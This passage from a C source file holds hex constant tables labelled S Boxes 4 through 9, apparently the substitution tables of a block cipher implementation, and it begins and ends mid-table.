0x6e8ba2b4L,0xc3dd17fbL,0x498cd482L,0x0dfe6a9fL,0xb0705829L, /* 20*/ 0x9a1e6dc1L,0xf829717cL,0x07bb8e3aL,0xda3c0b02L,0x1af82fc7L, /* 25*/ 0x73b70955L,0x7a04379cL,0x5ee20a28L,0x83712ae5L,0xf4c47c6dL, /* 30*/ 0xdf72ba56L,0xd794858dL,0x8c0cf709L,0x18f0f390L,0xb6c69b35L, /* 35*/ 
0xbf2f01dbL,0x2fa74dcaL,0xd0cd9127L,0xbde66cecL,0x3deebd46L, /* 40*/ 0x57c88fc3L,0xcee1406fL,0x0066385aL,0xf3c3444fL,0x3a79d5d5L, /* 45*/ 0x75751eb9L,0x3e7f8185L,0x521c2605L,0xe1aaab6eL,0x38ebb80fL, /* 50*/ 0xbee7e904L,0x61cb9647L,0xea54904eL,0x05ae00e4L,0x2d7ac65fL, /* 55*/ 0x087751a1L,0xdcd82915L,0x0921ee16L,0xdd86d33bL,0xd6bd491aL, /* 60*/ 0x40fbadf0L,0x4232cbd2L,0x33808d10L,0x39098c42L,0x193f3199L, /* 65*/ 0x0bc1e47aL,0x4a82b149L,0x02b65a8aL,0x104cdc8eL,0x24a8f52cL, /* 70*/ 0x685c6077L,0xc79f95c9L,0x1d11fe50L,0xc08dafcdL,0x7b1a9a03L, /* 75*/ 0x1c1f11d8L,0x84250e7fL,0x979db248L,0xebdc0501L,0xb9553395L, /* 80*/ 0xe3c05ea8L,0xb1e51c4cL,0x13b0e681L,0x3b407766L,0x36db3087L, /* 85*/ 0xee17c9fcL,0x6c53ecf2L,0xadccc58fL,0xc427660bL,0xefd5867dL, /* 90*/ 0x9b6d54a5L,0x6ff1aeffL,0x8e787952L,0x9e2bffe0L,0x8761d034L, /* 95*/ 0xe00bdbadL,0xae99a8d3L,0xcc03f6e2L,0xfd0ed807L,0x0e508ae3L, /* 100*/ 0xb74182abL,0x4349245dL,0xd120a465L,0xb246a641L,0xaf3b7ab0L, /* 105*/ 0x2a6488bbL,0x4b3a0d1fL,0xe7c7e58cL,0x3faff2ebL,0x90445ffdL, /* 110*/ 0xcf38c393L,0x995d07e7L,0xf24f1b36L,0x356f6891L,0x6d6ebcbeL, /* 115*/ 0x8da9e262L,0x50fd520eL,0x5bca9e1eL,0x37472cf3L,0x69075057L, /* 120*/ 0x7ec5fdedL,0x0cab892aL,0xfb2412baL,0x1728debfL,0xa000a988L, /* 125*/ 0xd843ce79L,0x042e20ddL,0x4fe8f853L,0x56659c3cL,0x2739d119L, /* 130*/ 0xa78a6120L,0x80960375L,0x70420611L,0x85e09f78L,0xabd17e96L, /* 135*/ 0x1b513eafL,0x1e01eb63L,0x26ad2133L,0xa890c094L,0x7613cf60L, /* 140*/ 0x817e781bL,0xa39113d7L,0xe957fa58L,0x4131b99eL,0x28b1efdaL, /* 145*/ 0x66acfba7L,0xff68944aL,0x77a44fd1L,0x7f331522L,0x59ffb3faL, /* 150*/ 0xa6df935bL,0xfa12d9dfL,0xc6bf6f3fL,0x89520cf6L,0x659edd6aL, /* 155*/ 0x544da739L,0x8b052538L,0x7c30ea21L,0xc2345525L,0x15927fb2L, /* 160*/ 0x144a436bL,0xba107b8bL,0x1219ac97L,0x06730432L,0x31831ab3L, /* 165*/ 0xc55a5c24L,0xaa0fcd3eL,0xe5606be8L,0x5c88f19bL,0x4c0841eeL, /* 170*/ 0x1fe37267L,0x11f9c4f4L,0x9f1b9daeL,0x864e76d0L,0xe637c731L, /* 175*/ 
0xd97d23a6L,0x32f53d5cL,0xb8161980L,0x93fa0f84L,0xcaef0870L, /* 180*/ 0x8874487eL,0x98f2cc73L,0x645fb5c6L,0xcd853659L,0x2062470dL, /* 185*/ 0x16ede8e9L,0x6b06dab5L,0x78b43900L,0xfc95b786L,0x5d8e7de1L, /* 190*/ 0x465b5954L,0xfe7ba014L,0xf7d23f7bL,0x92bc8b18L,0x03593592L, /* 195*/ 0x55cef4f7L,0x74b27317L,0x79de1fc2L,0xc8a0bfbdL,0x229398ccL, /* 200*/ 0x62a602ceL,0xbcb94661L,0x5336d206L,0xd2a375feL,0x6a6ab483L, /* 205*/ 0x4702a5a4L,0xa2e9d73dL,0x23a2e0f1L,0x9189140aL,0x581d18dcL, /* 210*/ 0xb39a922bL,0x82356212L,0xd5f432a9L,0xd356c2a3L,0x5f765b4dL, /* 215*/ 0x450afcc8L,0x4415e137L,0xe8ecdfbcL,0xed0de3eaL,0x60d42b13L, /* 220*/ 0xf13df971L,0x71fc5da2L,0xc1455340L,0xf087742fL,0xf55e5751L, /* 225*/ 0x67b3c1f8L,0xac6b8774L,0x7dcfaaacL,0x95983bc0L,0x489bb0b1L, /* 230*/ 0x2c184223L,0x964b6726L,0x2bd3271cL,0x72266472L,0xded64530L, /* 235*/ 0x0a2aa343L,0xd4f716a0L,0xb4dad6d9L,0x2184345eL,0x512c990cL, /* 240*/ 0x29d92d08L,0x2ebe709aL,0x01144c69L,0x34584b9dL,0xe4634ed6L, /* 245*/ 0xecc963cfL,0x3c6984aaL,0x4ed056efL,0x9ca56976L,0x8f3e80d4L, /* 250*/ 0xb5bae7c5L,0x30b5caf5L,0x63f33a64L,0xa9e4bbdeL,0xf6b82298L, /* 255*/ 0x4d673c1dL /* End of S Box 4 */ }, { /* Start of S Box 5 */ /* 0*/ 0x4b4f1121L,0xba183081L,0xc784f41fL,0xd17d0bacL,0x083d2267L, /* 5*/ 0x37b1361eL,0x3581ad05L,0xfda2f6bcL,0x1e892cddL,0xb56d3c3aL, /* 10*/ 0x32140e46L,0x138d8aabL,0xe14773d4L,0x5b0e71dfL,0x5d1fe055L, /* 15*/ 0x3fb991d3L,0xf1f46c71L,0xa325988cL,0x10f66e80L,0xb1006348L, /* 20*/ 0x726a9f60L,0x3b67f8baL,0x4e114ef4L,0x05c52115L,0x4c5ca11cL, /* 25*/ 0x99e1efd8L,0x471b83b3L,0xcbf7e524L,0x43ad82f5L,0x690ca93bL, /* 30*/ 0xfaa61bb2L,0x12a832b5L,0xb734f943L,0xbd22aea7L,0x88fec626L, /* 35*/ 0x5e80c3e7L,0xbe3eaf5eL,0x44617652L,0xa5724475L,0xbb3b9695L, /* 40*/ 0x7f3fee8fL,0x964e7debL,0x518c052dL,0x2a0bbc2bL,0xc2175f5cL, /* 45*/ 0x9a7b3889L,0xa70d8d0cL,0xeaccdd29L,0xcccd6658L,0x34bb25e6L, /* 50*/ 0xb8391090L,0xf651356fL,0x52987c9eL,0x0c16c1cdL,0x8e372d3cL, /* 55*/ 
0x2fc6ebbdL,0x6e5da3e3L,0xb0e27239L,0x5f685738L,0x45411786L, /* 60*/ 0x067f65f8L,0x61778b40L,0x81ab2e65L,0x14c8f0f9L,0xa6b7b4ceL, /* 65*/ 0x4036eaecL,0xbf62b00aL,0xecfd5e02L,0x045449a6L,0xb20afd28L, /* 70*/ 0x2166d273L,0x0d13a863L,0x89508756L,0xd51a7530L,0x2d653f7aL, /* 75*/ 0x3cdbdbc3L,0x80c9df4fL,0x3d5812d9L,0x53fbb1f3L,0xc0f185c0L, /* 80*/ 0x7a3c3d7eL,0x68646410L,0x857607a0L,0x1d12622eL,0x97f33466L, /* 85*/ 0xdb4c9917L,0x6469607cL,0x566e043dL,0x79ef1edbL,0x2c05898dL, /* 90*/ 0xc9578e25L,0xcd380101L,0x46e04377L,0x7d1cc7a9L,0x6552b837L, /* 95*/ 0x20192608L,0xb97500c5L,0xed296b44L,0x368648b4L,0x62995cd5L, /* 100*/ 0x82731400L,0xf9aebd8bL,0x3844c0c7L,0x7c2de794L,0x33a1a770L, /* 105*/ 0x8ae528c2L,0x5a2be812L,0x1f8f4a07L,0x2b5ed7caL,0x937eb564L, /* 110*/ 0x6fda7e11L,0xe49b5d6cL,0xb4b3244eL,0x18aa53a4L,0x3a061334L, /* 115*/ 0x4d6067a3L,0x83ba5868L,0x9bdf4dfeL,0x7449f261L,0x709f8450L, /* 120*/ 0xcad133cbL,0xde941c3fL,0xf52ae484L,0x781d77edL,0x7e4395f0L, /* 125*/ 0xae103b59L,0x922331bbL,0x42ce50c8L,0xe6f08153L,0xe7d941d0L, /* 130*/ 0x5028ed6bL,0xb3d2c49bL,0xad4d9c3eL,0xd201fb6eL,0xa45bd5beL, /* 135*/ 0xffcb7f4bL,0x579d7806L,0xf821bb5bL,0x59d592adL,0xd0be0c31L, /* 140*/ 0xd4e3b676L,0x0107165aL,0x0fe939d2L,0x49bcaafdL,0x55ffcfe5L, /* 145*/ 0x2ec1f783L,0xf39a09a5L,0x3eb42772L,0x19b55a5dL,0x024a0679L, /* 150*/ 0x8c83b3f7L,0x8642ba1dL,0xacacd9eaL,0x87d352c4L,0x60931f45L, /* 155*/ 0xa05f97d7L,0x1cecd42cL,0xe2fcc87bL,0xb60f94e2L,0x67a34b0bL, /* 160*/ 0xfcdd40c9L,0x0b150a27L,0xd3ee9e04L,0x582e29e9L,0x4ac22b41L, /* 165*/ 0x6ac4e1b8L,0xbccaa51aL,0x237af30eL,0xebc3b709L,0xc4a59d19L, /* 170*/ 0x284bc98aL,0xe9d41a93L,0x6bfa2018L,0x73b2d651L,0x11f9a2faL, /* 175*/ 0xce09bff1L,0x41a470aaL,0x25888f22L,0x77e754e8L,0xf7330d8eL, /* 180*/ 0x158eab16L,0xc5d68842L,0xc685a6f6L,0xe5b82fdeL,0x09ea3a96L, /* 185*/ 0x6dde1536L,0x4fa919daL,0x26c0be9fL,0x9eed6f69L,0xf05555f2L, /* 190*/ 0xe06fc285L,0x9cd76d23L,0xaf452a92L,0xefc74cb7L,0x9d6b4732L, /* 195*/ 
0x8be408eeL,0x22401d0dL,0xee6c459dL,0x7587cb82L,0xe8746862L, /* 200*/ 0x5cbdde87L,0x98794278L,0x31afb94dL,0xc11e0f2fL,0x30e8fc2aL, /* 205*/ 0xcf3261efL,0x1a3023e1L,0xaa2f86cfL,0xf202e24aL,0x8d08dcffL, /* 210*/ 0x764837c6L,0xa26374ccL,0x9f7c3e88L,0x949cc57dL,0xdd26a07fL, /* 215*/ 0xc39efab0L,0xc8f879a1L,0xdce67bb9L,0xf4b0a435L,0x912c9ae0L, /* 220*/ 0xd85603e4L,0x953a9bbfL,0xfb8290d6L,0x0aebcd5fL,0x16206a9aL, /* 225*/ 0x6c787a14L,0xd9a0f16aL,0x29bf4f74L,0x8f8bce91L,0x0e5a9354L, /* 230*/ 0xab038cb1L,0x1b8ad11bL,0xe327ff49L,0x0053da20L,0x90cf51dcL, /* 235*/ 0xda92fe6dL,0x0390ca47L,0xa8958097L,0xa9dc5bafL,0x3931e3c1L, /* 240*/ 0x840446b6L,0x63d069fbL,0xd7460299L,0x7124ecd1L,0x0791e613L, /* 245*/ 0x485918fcL,0xd635d04cL,0xdf96ac33L,0x66f2d303L,0x247056aeL, /* 250*/ 0xa1a7b2a8L,0x27d8cc9cL,0x17b6e998L,0x7bf5590fL,0xfe97f557L, /* 255*/ 0x5471d8a2L /* End of S Box 5 */ }, { /* Start of S Box 6 */ /* 0*/ 0x83a327a1L,0x9f379f51L,0x40a7d007L,0x11307423L,0x224587c1L, /* 5*/ 0xac27d63bL,0x3b7e64eaL,0x2e1cbfa6L,0x09996000L,0x03bc0e2cL, /* 10*/ 0xd4c4478aL,0x4542e0abL,0xfeda26d4L,0xc1d10fcbL,0x8252f596L, /* 15*/ 0x4494eb5cL,0xa362f314L,0xf5ba81fdL,0x75c3a376L,0x4ca214caL, /* 20*/ 0xe164deddL,0x5088fa97L,0x4b0930e0L,0x2fcfb7e8L,0x33a6f4b2L, /* 25*/ 0xc7e94211L,0x2d66c774L,0x43be8baeL,0xc663d445L,0x908eb130L, /* 30*/ 0xf4e3be15L,0x63b9d566L,0x529396b5L,0x1e1be743L,0x4d5ff63fL, /* 35*/ 0x985e4a83L,0x71ab9df7L,0xc516c6f5L,0x85c19ab4L,0x1f4daee4L, /* 40*/ 0xf2973431L,0xb713dc5eL,0x3f2e159aL,0xc824da16L,0x06bf376aL, /* 45*/ 0xb2fe23ecL,0xe39b1c22L,0xf1eecb5fL,0x08e82d52L,0x565686c2L, /* 50*/ 0xab0aea93L,0xfd47219fL,0xebdbabd7L,0x2404a185L,0x8c7312b9L, /* 55*/ 0xa8f2d828L,0x0c8902daL,0x65b42b63L,0xc0bbef62L,0x4e3e4cefL, /* 60*/ 0x788f8018L,0xee1ebab7L,0x93928f9dL,0x683d2903L,0xd3b60689L, /* 65*/ 0xafcb0ddcL,0x88a4c47aL,0xf6dd9c3dL,0x7ea5fca0L,0x8a6d7244L, /* 70*/ 0xbe11f120L,0x04ff91b8L,0x8d2dc8c0L,0x27f97fdbL,0x7f9e1f47L, /* 75*/ 
0x1734f0c7L,0x26f3ed8eL,0x0df8f2bfL,0xb0833d9eL,0xe420a4e5L, /* 80*/ 0xa423cae6L,0x95616772L,0x9ae6c049L,0x075941f2L,0xd8e12812L, /* 85*/ 0x000f6f4fL,0x3c0d6b05L,0x6cef921cL,0xb82bc264L,0x396cb008L, /* 90*/ 0x5d608a6fL,0x6d7782c8L,0x186550aaL,0x6b6fec09L,0x28e70b13L, /* 95*/ 0x57ce5688L,0xecd3af84L,0x23335a95L,0x91f40cd2L,0x7b6a3b26L, /* 100*/ 0xbd32b3b6L,0x3754a6fbL,0x8ed088f0L,0xf867e87cL,0x20851746L, /* 105*/ 0x6410f9c6L,0x35380442L,0xc2ca10a7L,0x1adea27fL,0x76bddd79L, /* 110*/ 0x92742cf4L,0x0e98f7eeL,0x164e931dL,0xb9c835b3L,0x69060a99L, /* 115*/ 0xb44c531eL,0xfa7b66feL,0xc98a5b53L,0x7d95aae9L,0x302f467bL, /* 120*/ 0x74b811deL,0xf3866abdL,0xb5b3d32dL,0xfc3157a4L,0xd251fe19L, /* 125*/ 0x0b5d8eacL,0xda71ffd5L,0x47ea05a3L,0x05c6a9e1L,0xca0ee958L, /* 130*/ 0x9939034dL,0x25dc5edfL,0x79083cb1L,0x86768450L,0xcf757d6dL, /* 135*/ 0x5972b6bcL,0xa78d59c9L,0xc4ad8d41L,0x2a362ad3L,0xd1179991L, /* 140*/ 0x601407ffL,0xdcf50917L,0x587069d0L,0xe0821ed6L,0xdbb59427L, /* 145*/ 0x73911a4bL,0x7c904fc3L,0x844afb92L,0x6f8c955dL,0xe8c0c5bbL, /* 150*/ 0xb67ab987L,0xa529d96cL,0xf91f7181L,0x618b1b06L,0xe718bb0cL, /* 155*/ 0x8bd7615bL,0xd5a93a59L,0x54aef81bL,0x772136e3L,0xce44fd9cL, /* 160*/ 0x10cda57eL,0x87d66e0bL,0x3d798967L,0x1b2c1804L,0x3edfbd68L, /* 165*/ 0x15f6e62bL,0xef68b854L,0x3896db35L,0x12b7b5e2L,0xcb489029L, /* 170*/ 0x9e4f98a5L,0x62eb77a8L,0x217c24a2L,0x964152f6L,0x49b2080aL, /* 175*/ 0x53d23ee7L,0x48fb6d69L,0x1903d190L,0x9449e494L,0xbf6e7886L, /* 180*/ 0xfb356cfaL,0x3a261365L,0x424bc1ebL,0xa1192570L,0x019ca782L, /* 185*/ 0x9d3f7e0eL,0x9c127575L,0xedf02039L,0xad57bcceL,0x5c153277L, /* 190*/ 0x81a84540L,0xbcaa7356L,0xccd59b60L,0xa62a629bL,0xa25ccd10L, /* 195*/ 0x2b5b65cfL,0x1c535832L,0x55fd4e3aL,0x31d9790dL,0xf06bc37dL, /* 200*/ 0x4afc1d71L,0xaeed5533L,0xba461634L,0xbb694b78L,0x5f3a5c73L, /* 205*/ 0x6a3c764aL,0x8fb0cca9L,0xf725684cL,0x4fe5382fL,0x1d0163afL, /* 210*/ 0x5aa07a8fL,0xe205a8edL,0xc30bad38L,0xff22cf1fL,0x72432e2eL, /* 215*/ 
0x32c2518bL,0x3487ce4eL,0x7ae0ac02L,0x709fa098L,0x0a3b395aL, /* 220*/ 0x5b4043f8L,0xa9e48c36L,0x149a8521L,0xd07dee6bL,0x46acd2f3L, /* 225*/ 0x8958dffcL,0xb3a1223cL,0xb11d31c4L,0xcd7f4d3eL,0x0f28e3adL, /* 230*/ 0xe5b100beL,0xaac54824L,0xe9c9d7baL,0x9bd47001L,0x80f149b0L, /* 235*/ 0x66022f0fL,0x020c4048L,0x6efa192aL,0x67073f8dL,0x13ec7bf9L, /* 240*/ 0x3655011aL,0xe6afe157L,0xd9845f6eL,0xdecc4425L,0x511ae2ccL, /* 245*/ 0xdf81b4d8L,0xd7809e55L,0xd6d883d9L,0x2cc7978cL,0x5e787cc5L, /* 250*/ 0xdd0033d1L,0xa050c937L,0x97f75dcdL,0x299de580L,0x41e2b261L, /* 255*/ 0xea5a54f1L /* End of S Box 6 */ }, { /* Start of S Box 7 */ /* 0*/ 0x7e672590L,0xbea513bbL,0x2c906fe6L,0x86029c2bL,0x55dc4f74L, /* 5*/ 0x0553398eL,0x63e09647L,0xcafd0babL,0x264c37dfL,0x8272210fL, /* 10*/ 0x67afa669L,0x12d98a5fL,0x8cab23c4L,0x75c68bd1L,0xc3370470L, /* 15*/ 0x33f37f4eL,0x283992ffL,0xe73a3a67L,0x1032f283L,0xf5ad9fc2L, /* 20*/ 0x963f0c5dL,0x664fbc45L,0x202ba41cL,0xc7c02d80L,0x54731e84L, /* 25*/ 0x8a1085f5L,0x601d80fbL,0x2f968e55L,0x35e96812L,0xe45a8f78L, /* 30*/ 0xbd7de662L,0x3b6e6eadL,0x8097c5efL,0x070b6781L,0xb1e508f3L, /* 35*/ 0x24e4fae3L,0xb81a7805L,0xec0fc918L,0x43c8774bL,0x9b2512a9L, /* 40*/ 0x2b05ad04L,0x32c2536fL,0xedf236e0L,0x8bc4b0cfL,0xbaceb837L, /* 45*/ 0x4535b289L,0x0d0e94c3L,0xa5a371d0L,0xad695a58L,0x39e3437dL, /* 50*/ 0x9186bffcL,0x21038c3bL,0x0aa9dff9L,0x5d1f06ceL,0x62def8a4L, /* 55*/ 0xf740a2b4L,0xa2575868L,0x682683c1L,0xdbb30facL,0x61fe1928L, /* 60*/ 0x468a6511L,0xc61cd5f4L,0xe54d9800L,0x6b98d7f7L,0x8418b6a5L, /* 65*/ 0x5f09a5d2L,0x90b4e80bL,0x49b2c852L,0x69f11c77L,0x17412b7eL, /* 70*/ 0x7f6fc0edL,0x56838dccL,0x6e9546a2L,0xd0758619L,0x087b9b9aL, /* 75*/ 0xd231a01dL,0xaf46d415L,0x097060fdL,0xd920f657L,0x882d3f9fL, /* 80*/ 0x3ae7c3c9L,0xe8a00d9bL,0x4fe67ebeL,0x2ef80eb2L,0xc1916b0cL, /* 85*/ 0xf4dffea0L,0xb97eb3ebL,0xfdff84ddL,0xff8b14f1L,0xe96b0572L, /* 90*/ 0xf64b508cL,0xae220a6eL,0x4423ae5aL,0xc2bece5eL,0xde27567cL, /* 95*/ 0xfc935c63L,0x47075573L,0xe65b27f0L,0xe121fd22L,0xf2668753L, 
/* 100*/ 0x2debf5d7L,0x8347e08dL,0xac5eda03L,0x2a7cebe9L,0x3fe8d92eL, /* 105*/ 0x23542fe4L,0x1fa7bd50L,0xcf9b4102L,0x9d0dba39L,0x9cb8902aL, /* 110*/ 0xa7249d8bL,0x0f6d667aL,0x5ebfa9ecL,0x6a594df2L,0x79600938L, /* 115*/ 0x023b7591L,0xea2c79c8L,0xc99d07eaL,0x64cb5ee1L,0x1a9cab3dL, /* 120*/ 0x76db9527L,0xc08e012fL,0x3dfb481aL,0x872f22e7L,0x2948d15cL, /* 125*/ 0xa4782c79L,0x6f50d232L,0x78f0728aL,0x5a87aab1L,0xc4e2c19cL, /* 130*/ 0xee767387L,0x1b2a1864L,0x7b8d10d3L,0xd1713161L,0x0eeac456L, /* 135*/ 0xd8799e06L,0xb645b548L,0x4043cb65L,0xa874fb29L,0x4b12d030L, /* 140*/ 0x7d687413L,0x18ef9a1fL,0xd7631d4cL,0x5829c7daL,0xcdfa30faL, /* 145*/ 0xc5084bb0L,0x92cd20e2L,0xd4c16940L,0x03283ec0L,0xa917813fL, /* 150*/ 0x9a587d01L,0x70041f8fL,0xdc6ab1dcL,0xddaee3d5L,0x31829742L, /* 155*/ 0x198c022dL,0x1c9eafcbL,0x5bbc6c49L,0xd3d3293aL,0x16d50007L, /* 160*/ 0x04bb8820L,0x3c5c2a41L,0x37ee7af8L,0x8eb04025L,0x9313ecbaL, /* 165*/ 0xbffc4799L,0x8955a744L,0xef85d633L,0x504499a7L,0xa6ca6a86L, /* 170*/ 0xbb3d3297L,0xb34a8236L,0x6dccbe4fL,0x06143394L,0xce19fc7bL, /* 175*/ 0xccc3c6c6L,0xe36254aeL,0x77b7eda1L,0xa133dd9eL,0xebf9356aL, /* 180*/ 0x513ccf88L,0xe2a1b417L,0x972ee5bdL,0x853824cdL,0x5752f4eeL, /* 185*/ 0x6c1142e8L,0x3ea4f309L,0xb2b5934aL,0xdfd628aaL,0x59acea3eL, /* 190*/ 0xa01eb92cL,0x389964bcL,0xda305dd4L,0x019a59b7L,0x11d2ca93L, /* 195*/ 0xfaa6d3b9L,0x4e772ecaL,0x72651776L,0xfb4e5b0eL,0xa38f91a8L, /* 200*/ 0x1d0663b5L,0x30f4f192L,0xb50051b6L,0xb716ccb3L,0x4abd1b59L, /* 205*/ 0x146c5f26L,0xf134e2deL,0x00f67c6cL,0xb0e1b795L,0x98aa4ec7L, /* 210*/ 0x0cc73b34L,0x654276a3L,0x8d1ba871L,0x740a5216L,0xe0d01a23L, /* 215*/ 0x9ed161d6L,0x9f36a324L,0x993ebb7fL,0xfeb9491bL,0x365ddcdbL, /* 220*/ 0x810cffc5L,0x71ec0382L,0x2249e7bfL,0x48817046L,0xf3a24a5bL, /* 225*/ 0x4288e4d9L,0x0bf5c243L,0x257fe151L,0x95b64c0dL,0x4164f066L, /* 230*/ 0xaaf7db08L,0x73b1119dL,0x8f9f7bb8L,0xd6844596L,0xf07a34a6L, /* 235*/ 0x53943d0aL,0xf9dd166dL,0x7a8957afL,0xf8ba3ce5L,0x27c9621eL, /* 240*/ 
0x5cdae910L,0xc8518998L,0x941538feL,0x136115d8L,0xaba8443cL, /* 245*/ 0x4d01f931L,0x34edf760L,0xb45f266bL,0xd5d4de14L,0x52d8ac35L, /* 250*/ 0x15cfd885L,0xcbc5cd21L,0x4cd76d4dL,0x7c80ef54L,0xbc92ee75L, /* 255*/ 0x1e56a1f6L /* End of S Box 7 */ }, { /* Start of S Box 8 */ /* 0*/ 0xbaa20b6cL,0x9ffbad26L,0xe1f7d738L,0x794aec8dL,0xc9e9cf3cL, /* 5*/ 0x8a9a7846L,0xc57c4685L,0xb9a92fedL,0x29cb141fL,0x52f9ddb7L, /* 10*/ 0xf68ba6bcL,0x19ccc020L,0x4f584aaaL,0x3bf6a596L,0x003b7cf7L, /* 15*/ 0x54f0ce9aL,0xa7ec4303L,0x46cf0077L,0x78d33aa1L,0x215247d9L, /* 20*/ 0x74bcdf91L,0x08381d30L,0xdac43e40L,0x64872531L,0x0beffe5fL, /* 25*/ 0xb317f457L,0xaebb12daL,0xd5d0d67bL,0x7d75c6b4L,0x42a6d241L, /* 30*/ 0x1502d0a9L,0x3fd97fffL,0xc6c3ed28L,0x81868d0aL,0x92628bc5L, /* 35*/ 0x86679544L,0xfd1867afL,0x5ca3ea61L,0x568d5578L,0x4a2d71f4L, /* 40*/ 0x43c9d549L,0x8d95de2bL,0x6e5c74a0L,0x9120ffc7L,0x0d05d14aL, /* 45*/ 0xa93049d3L,0xbfa80e17L,0xf4096810L,0x043f5ef5L,0xa673b4f1L, /* 50*/ 0x6d780298L,0xa4847783L,0x5ee726fbL,0x9934c281L,0x220a588cL, /* 55*/ 0x384e240fL,0x933d5c69L,0x39e5ef47L,0x26e8b8f3L,0x4c1c6212L, /* 60*/ 0x8040f75dL,0x074b7093L,0x6625a8d7L,0x36298945L,0x76285088L, /* 65*/ 0x651d37c3L,0x24f5274dL,0xdbca3dabL,0x186b7ee1L,0xd80f8182L, /* 70*/ 0x14210c89L,0x943a3075L,0x4e6e11c4L,0x4d7e6badL,0xf05064c8L, /* 75*/ 0x025dcd97L,0x4bc10302L,0x7cede572L,0x8f90a970L,0xab88eebaL, /* 80*/ 0xb5998029L,0x5124d839L,0xb0eeb6a3L,0x89ddabdcL,0xe8074d76L, /* 85*/ 0xa1465223L,0x32518cf2L,0x9d39d4ebL,0xc0d84524L,0xe35e6ea8L, /* 90*/ 0x7abf3804L,0x113e2348L,0x9ae6069dL,0xb4dfdabbL,0xa8c5313fL, /* 95*/ 0x23ea3f79L,0x530e36a2L,0xa5fd228bL,0x95d1d350L,0x2b14cc09L, /* 100*/ 0x40042956L,0x879d05ccL,0x2064b9caL,0xacaca40eL,0xb29c846eL, /* 105*/ 0x9676c9e3L,0x752b7b8aL,0x7be2bcc2L,0x6bd58f5eL,0xd48f4c32L, /* 110*/ 0x606835e4L,0x9cd7c364L,0x2c269b7aL,0x3a0d079cL,0x73b683feL, /* 115*/ 0x45374f1eL,0x10afa242L,0x577f8666L,0xddaa10f6L,0xf34f561cL, /* 120*/ 0x3d355d6bL,0xe47048aeL,0xaa13c492L,0x050344fdL,0x2aab5151L, 
/* 125*/ 0xf5b26ae5L,0xed919a59L,0x5ac67900L,0xf1cde380L,0x0c79a11bL, /* 130*/ 0x351533fcL,0xcd4d8e36L,0x1f856005L,0x690b9fddL,0xe736dccfL, /* 135*/ 0x1d47bf6aL,0x7f66c72aL,0x85f21b7fL,0x983cbdb6L,0x01ebbebfL, /* 140*/ 0x035f3b99L,0xeb111f34L,0x28cefdc6L,0x5bfc9ecdL,0xf22eacb0L, /* 145*/ 0x9e41cbb2L,0xe0f8327cL,0x82e3e26fL,0xfc43fc86L,0xd0ba66dfL, /* 150*/ 0x489ef2a7L,0xd9e0c81dL,0x68690d52L,0xcc451367L,0xc2232e16L, /* 155*/ 0xe95a7335L,0x0fdae19bL,0xff5b962cL,0x97596527L,0xc46db333L, /* 160*/ 0x3ed4c562L,0xc14c9d9eL,0x5d6faa21L,0x638e940dL,0xf9316d58L, /* 165*/ 0x47b3b0eaL,0x30ffcad2L,0xce1bba7dL,0x1e6108e6L,0x2e1ea33dL, /* 170*/ 0x507bf05bL,0xfafef94bL,0xd17de8e2L,0x5598b214L,0x1663f813L, /* 175*/ 0x17d25a2dL,0xeefa5ff9L,0x582f4e37L,0x12128773L,0xfef17ab8L, /* 180*/ 0x06005322L,0xbb32bbc9L,0x8c898508L,0x592c15f0L,0xd38a4054L, /* 185*/ 0x4957b7d6L,0xd2b891dbL,0x37bd2d3eL,0x34ad20cbL,0x622288e9L, /* 190*/ 0x2dc7345aL,0xafb416c0L,0x1cf459b1L,0xdc7739faL,0x0a711a25L, /* 195*/ 0x13e18a0cL,0x5f72af4cL,0x6ac8db11L,0xbe53c18eL,0x1aa569b9L, /* 200*/ 0xef551ea4L,0xa02a429fL,0xbd16e790L,0x7eb9171aL,0x77d693d8L, /* 205*/ 0x8e06993aL,0x9bde7560L,0xe5801987L,0xc37a09beL,0xb8db76acL, /* 210*/ 0xe2087294L,0x6c81616dL,0xb7f30fe7L,0xbc9b82bdL,0xfba4e4d4L, /* 215*/ 0xc7b1012fL,0xa20c043bL,0xde9febd0L,0x2f9297ceL,0xe610aef8L, /* 220*/ 0x70b06f19L,0xc86ae00bL,0x0e01988fL,0x41192ae0L,0x448c1cb5L, /* 225*/ 0xadbe92eeL,0x7293a007L,0x1b54b5b3L,0xd61f63d1L,0xeae40a74L, /* 230*/ 0x61a72b55L,0xec83a7d5L,0x88942806L,0x90a07da5L,0xd7424b95L, /* 235*/ 0x67745b4eL,0xa31a1853L,0xca6021efL,0xdfb56c4fL,0xcbc2d915L, /* 240*/ 0x3c48e918L,0x8bae3c63L,0x6f659c71L,0xf8b754c1L,0x2782f3deL, /* 245*/ 0xf796f168L,0x71492c84L,0x33c0f5a6L,0x3144f6ecL,0x25dc412eL, /* 250*/ 0xb16c5743L,0x83a1fa7eL,0x0997b101L,0xb627e6e8L,0xcf33905cL, /* 255*/ 0x8456fb65L /* End of S Box 8 */ }, { /* Start of S Box 9 */ /* 0*/ 0xb29bea74L,0xc35da605L,0x305c1ca3L,0xd2e9f5bcL,0x6fd5bff4L, /* 5*/ 
0xff347703L,0xfc45b163L,0xf498e068L,0xb71229fcL,0x81acc3fbL, /* 10*/ 0x78538a8bL,0x984ecf81L,0xa5da47a4L,0x8f259eefL,0x6475dc65L, /* 15*/ 0x081865b9L,0x49e14a3cL,0x19e66079L,0xd382e91bL,0x5b109794L, /* 20*/ 0x3f9f81e1L,0x4470a388L,0x41601abeL,0xaaf9f407L,0x8e175ef6L, /* 25*/ 0xed842297L,0x893a4271L,0x1790839aL,0xd566a99eL,0x6b417deeL, /* 30*/ 0x75c90d23L,0x715edb31L,0x723553f7L,0x9afb50c9L,0xfbc5f600L, /* 35*/ 0xcd3b6a4eL,0x97ed0fbaL,0x29689aecL,0x63135c8eL,0xf0e26c7eL, /* 40*/ 0x0692ae7fL,0xdbb208ffL,0x2ede3e9bL,0x6a65bebdL,0xd40867e9L, /* 45*/ 0xc954afc5L,0x73b08201L,0x7ffdf809L,0x1195c24fL,0x1ca5adcaL, /* 50*/ 0x74bd6d1fL,0xb393c455L,0xcadfd3faL,0x99f13011L,0x0ebca813L, /* 55*/ 0x60e791b8L,0x6597ac7aL,0x18a7e46bL,0x09cb49d3L,0x0b27df6dL, /* 60*/ 0xcfe52f87L,0xcef66837L,0xe6328035L,0xfa87c592L,0x37baff93L, /* 65*/ 0xd71fcc99L,0xdcab205cL,0x4d7a5638L,0x48012510L,0x62797558L, /* 70*/ 0xb6cf1fe5L,0xbc311834L,0x9c2373acL,0x14ec6175L,0xa439cbdfL, /* 75*/ 0x54afb0eaL,0xd686960bL,0xfdd0d47bL,0x7b063902L,0x8b78bac3L, /* 80*/ 